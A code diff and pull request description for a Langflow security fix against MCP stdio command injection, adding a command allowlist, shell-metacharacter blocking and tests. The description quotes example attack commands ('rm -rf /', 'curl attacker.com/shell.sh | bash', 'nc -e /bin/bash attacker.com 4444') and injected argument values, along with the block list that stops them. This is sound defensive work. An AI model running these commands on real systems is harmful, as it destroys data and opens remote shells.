+      if (response.url().includes('/api/v1/mcp/')) {
+        console.log(`=== API RESPONSE ===`);
+        console.log(`URL: ${response.url()}`);
+        console.log(`Status: ${response.status()}`);
+        try {
+          const body = await response.json();
+          console.log(`Body:`, JSON.stringify(body, null, 2));
+        } catch (e) {
+          console.log(`Could not parse response body`);
+        }
+        console.log(`=== END API RESPONSE ===`);
+      }
+    });
+    
     await page.getByTestId("add-mcp-server-button").click();
+
+    // Wait a bit to see what happens
+    await page.waitForTimeout(2000);
+    
+    // Check for any error messages on the page
+    const pageContent = await page.content();
+    console.log("=== CHECKING FOR ERROR MESSAGES ===");
+    const hasServerExists = pageContent.includes("Server already exists");
+    const hasValidationError = pageContent.includes("not allowed") || pageContent.includes("security");
+    console.log(`Has "Server already exists": ${hasServerExists}`);
+    console.log(`Has validation error: ${hasValidationError}`);
+    console.log("=== END ERROR CHECK ===");
 
     // Wait for error message to appear
     await expect(page.getByText("Server already exists.")).toBeVisible({

--- a/src/lfx/src/lfx/base/mcp/util.py
+++ b/src/lfx/src/lfx/base/mcp/util.py
@@ -1224,7 +1224,23 @@ class MCPStdioClient:
         self._component_cache = component_cache
 
     async def _connect_to_server(self, command_str: str, env: dict[str, str] | None = None) -> list[StructuredTool]:
-        """Connect to MCP server using stdio transport (SDK style)."""
+        """Connect to MCP server using stdio transport (SDK style).
+
+        .. todo:: Remove the ``bash -c`` / ``cmd /c`` shell wrapper and pass
+           command + args directly to ``StdioServerParameters`` (i.e.
+           ``shell=False`` semantics).  This would eliminate an entire class of
+           injection vectors (shell metacharacters, IFS manipulation,
+           BASH_ENV/BASH_FUNC_* startup injection) and allow removing several
+           entries from ``DANGEROUS_ENV_VARS`` in ``schemas.py``.  Requires:
+           1. Changing the signature to accept ``(command, args)`` separately.
+           2. Updating ``update_tools()`` to stop joining into a shell string.
+           3. Handling multi-word ``command`` config values (e.g.
+              ``"uvx mcp-server-fetch"``) by splitting at the caller.
+           4. Verifying Windows PATH resolution works without ``cmd /c``
+              (e.g. ``.cmd`` wrapper scripts like ``npx.cmd``).
+           5. Replacing the ``|| echo 'Command failed…'`` error-reporting
+              pattern with proper exit-code handling from ``anyio.open_process``.
+        """
         from mcp import StdioServerParameters
 
         command = shlex.split(command_str)


### PR DESCRIPTION
## 🔒 Security Fix: MCP Command Injection (CWE-78)

### Vulnerability Summary
**Severity:** CRITICAL (CVSS 9.0+)  
**CWE:** CWE-78 (OS Command Injection)  
**Impact:** Remote Code Execution (RCE)

Unauthenticated attackers could add MCP stdio servers with arbitrary commands, achieving command execution on the host system.

### Root Cause
The MCP stdio server configuration accepted any command without validation, allowing attackers to execute:
- `touch /tmp/pwned` - File creation
- `rm -rf /` - System destruction
- `curl attacker.com/shell.sh | bash` - Reverse shell
- `nc -e /bin/bash attacker.com 4444` - Remote access

### Fix Implemented
✅ **Command Allowlist Validation** in `MCPServerConfig` schema:
- Only allows: `node`, `python`, `python3`, `npx`, `uvx`, `docker`
- Blocks all other commands (rm, curl, wget, bash, sh, nc, touch, etc.)

✅ **Shell Metacharacter Blocking** in arguments:
- Blocks: `;`, `|`, `&`, `$`, `` ` ``, `(`, `)`, `<`, `>`, `\n`, `\r`
- Prevents command injection via argument manipulation

✅ **Cross-Platform Support**:
- Handles Windows paths: `C:\Program Files\nodejs\node.exe`
- Handles Unix paths: `/usr/bin/node`

### Testing
✅ **27 Unit Tests** - All passing
✅ **Live curl testing** - All attack vectors blocked
✅ **Code formatted and linted** - No issues

### Test Results
```bash
# Malicious commands REJECTED ✅
touch → "Command 'touch' is not allowed"
rm → "Command 'rm' is not allowed"
curl → "Command 'curl' is not allowed"

# Shell injection BLOCKED ✅
"test; rm -rf /" → "dangerous shell metacharacter ';'"
"test | bash" → "dangerous shell metacharacter '|'"
"$(rm -rf /)" → "dangerous shell metacharacter '$'"

# Legitimate commands ACCEPTED ✅
node, python, python3, npx, uvx, docker → All work correctly
```

Advisory: https://github.com/langflow-ai/langflow/security/advisories/GHSA-w794-rj3p-xv45
JIRA: https://datastax.jira.com/browse/LE-536

<img width="937" height="391" alt="Screenshot 2026-03-23 at 12 42 04 PM" src="https://github.com/user-attachments/assets/0a4b62fc-5f4b-42c4-b1da-1cb670a22ef0" />

<img width="931" height="407" alt="Screenshot 2026-03-23 at 12 42 23 PM" src="https://github.com/user-attachments/assets/996bae69-81fd-4320-b47c-2a2f6eac7f68" />

<img width="934" height="234" alt="Screenshot 2026-03-23 at 12 42 43 PM" src="https://github.com/user-attachments/assets/a9898a15-a5dc-46ae-8ced-da201109bd57" />
